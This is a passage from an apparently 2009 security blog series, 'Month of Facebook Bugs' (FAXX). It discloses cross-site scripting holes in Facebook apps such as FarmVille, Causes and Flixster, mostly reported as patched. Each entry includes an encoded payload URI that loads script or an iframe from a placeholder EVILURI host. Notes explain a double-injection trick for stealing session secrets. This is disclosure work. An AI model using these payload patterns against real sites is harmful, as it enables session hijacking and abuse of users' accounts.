FAXX Hack: Farm Town

Current Monthly Active Users: 18,638,429

Current Rank on Application Leaderboard: 7

Application Developer: Slashkey

Responsiveness: Slashkey reported that they went through their codebase and encoded all URI parameters after receiving word of the problem.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/farmtown/select_friends/?type=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%253A%252F%252Fl1.slashkey.com%252Ffacebook%252Ffarm%252Fselect_friends%252F%253Ftype%253D%252522%25252F%25253E%25253Ciframe%252Bsrc%25253D%252522http%25253A%25252F%25252FEVILURI%25252F%252522%25253E%2526select%253Dfarm%22%2F%3E&select=farm

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Movies (Flixster)

Facebook Verified Application

Current Monthly Active Users: 19,392,931

Current Rank on Application Leaderboard: 6

Application Developer: Flixster

Responsiveness: As of Sep. 4, the hole remains and I’ve had no word from Flixster. I received an e-mail from Flixster this evening confirming a fix.

Vulnerability Status: Unpatched Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/flixster/auth/account-merge?from=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fbk.flixster.com%2Ffacebook%2Fauth%2Faccount-merge%3Ffrom%3D%2522%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: LivingSocial

I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.

Facebook Verified Application

Current Monthly Active Users: 23,688,212

Current Rank on Application Leaderboard: 3

Application Developer: LivingSocial

Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22

Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities.  The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAQs on FAXX and the “Month of Facebook Bugs”

Isn’t this a just month of Facebook Application Bugs? Not exactly. While each of the vulnerabilities occur in Facebook applications, a hacker can exploit each one in powerful ways and gain access to many Facebook features. Also, such attacks are made possible by the very structure of the Facebook Platform – the fact that any of these application holes allows the same type of attack demonstrates that the problem goes beyond specific applications.

As long as the Platform remains in its current configuration, application-based attacks (FAXX = Facebook Application XSS/XSRF) will continue to be possible. I can ensure that 30 popular applications are patched, but if a 31st remains open, users are still vulnerable. If Facebook allows third-party applications to operate on their service, they cannot simply relegate security and privacy responsibilities to application developers.

These are all just XSS holes. What sort of attacks are possible with them? Each XSS hole lets an attacker hijack the session credentials of the current user, provided they’re logged into the application.  With those credentials, one can execute any Facebook API request that the application can make during the user’s session.

By default, this includes accessing a user’s full profile information, accessing the profile information of friends, accessing photos of a user or their friends, sending notifications to friends (with links), and posting feed stories on a user’s wall (with links). Notifications and feed stories would appear to come from the hijacked application. Some applications have extended permissions which can be exploited, such as updating a user’s status or publishing to their stream.

Finally, many applications allow for clickjacking installs, which means that users who have not already authorized the application (or who have exempted from the Platform altogether) are still vulnerable to an attack. I plan on releasing full source code demonstrating these attack vectors once the series comes to a close.

But the applications you do publish will be secure once they’re patched, right? Each time I evaluate an application, my goal is simply to find a hole. Once I’ve found one, I report it and move on to another application. Every application listed here could easily have other vulnerabilities that I have not yet found.

Will this really last an entire month? When I began this project, I had six holes ready to post.  Since starting the series two days ago, I’ve added two more to my list. I started by focusing on the most popular applications, meaning hundreds if not thousands have yet to be tested. Based on my experiences so far, I’m fairly confident that I will find 30 vulnerabilities by the time September finishes.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hack: Causes

Facebook Verified Application

Current Monthly Active Users: 26,271,410

Current Rank on Application Leaderboard: 2

Application Developer: Causes

Responsiveness: After notifying Causes, I received word that a fix was being deployed. The patch appears to be thorough.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: hxxp://apps.facebook.com/causes/help?category=%22%3E%3C%2Ful%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Fwww.causes.com%2Ffb%2Fhelp%3Fcategory%3D%2522%253E%253C%252Ful%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%22%3E

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

The month of Facebook bugs begins!

As posted previously by theharmonyguy…the month of Facebook bugs has begun!

One of our contributors theharmonyguy will hopefully be posting one Facebook application bug per day for the month of September.  He is going to keep this up for the entire month if he can.  He does need your help though!  If you have a bug you found either in Facebook or in a Facebook application, please send it to theharmonyguy [aT] gmail.  Full credit will be given to you for finding a bug.

Lets hope this month we raise some awareness of vulnerabilities in Facebook and the Facebook application platform!  Look for the hashtag of #FAXX on Twitter for news and alerts on new vulnerabilites found this month.

You can find out more information in this great article over at DarkReading on the month of Facebook bugs.

FAXX Hack: FarmVille

Current Monthly Active Users: 33,439,207

Current Rank on Application Leaderboard: 1

Application Developer: Zynga

Responsiveness: After notifying Zynga, I received a reply almost immediately from their Senior Director of Security.  The company moved swiftly to patch the hole, and they’ve been both very responsive and very gracious in their communications.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E

Notes: Several of the recent holes I’ve found are similar to this one.  Rather than relaying a particular property from the URI within the FBML/HTML of the page, the application included a complete copy of the URI at some point.  This often happens when an application includes a tracker or perhaps needs a form that submits back to the current page.  But if the URI is not escaped prior to being included in such a context, one can add code to the end of the URI that closes a given tag and allows new tags to be inserted.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\”><fb:iframe src=’http://EVILURI/’>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Unpatched Patched as of Sep. 2, 2009

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.

Facebook Instapaper Twitter Digg FriendFeed Delicious Google Bookmarks Yahoo Bookmarks Share/Bookmark

1 6 7 8 9 10 12